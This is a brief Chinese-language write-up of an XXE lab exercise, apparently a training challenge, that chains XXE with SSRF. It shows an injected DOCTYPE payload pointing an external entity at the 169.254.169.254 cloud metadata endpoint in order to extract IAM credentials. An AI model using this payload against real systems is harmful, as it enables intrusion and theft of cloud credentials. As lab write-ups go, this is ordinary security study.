# XXE Lab2 這題 XXE + SSRF 的實戰題,目的就是透過 XXE 漏洞發 SSRF 請求到 EC2 metadata(模擬 AWS 內部機制)來偷取 IAM 資訊。。 一樣進入網站並攔截請求。   接著修改請求,我們進入題目給的 IP。 ``` <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]> ```  發現系統提示我們還有一層,所以我們繼續爬。  爬到底就會出現我們要的東西。  ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up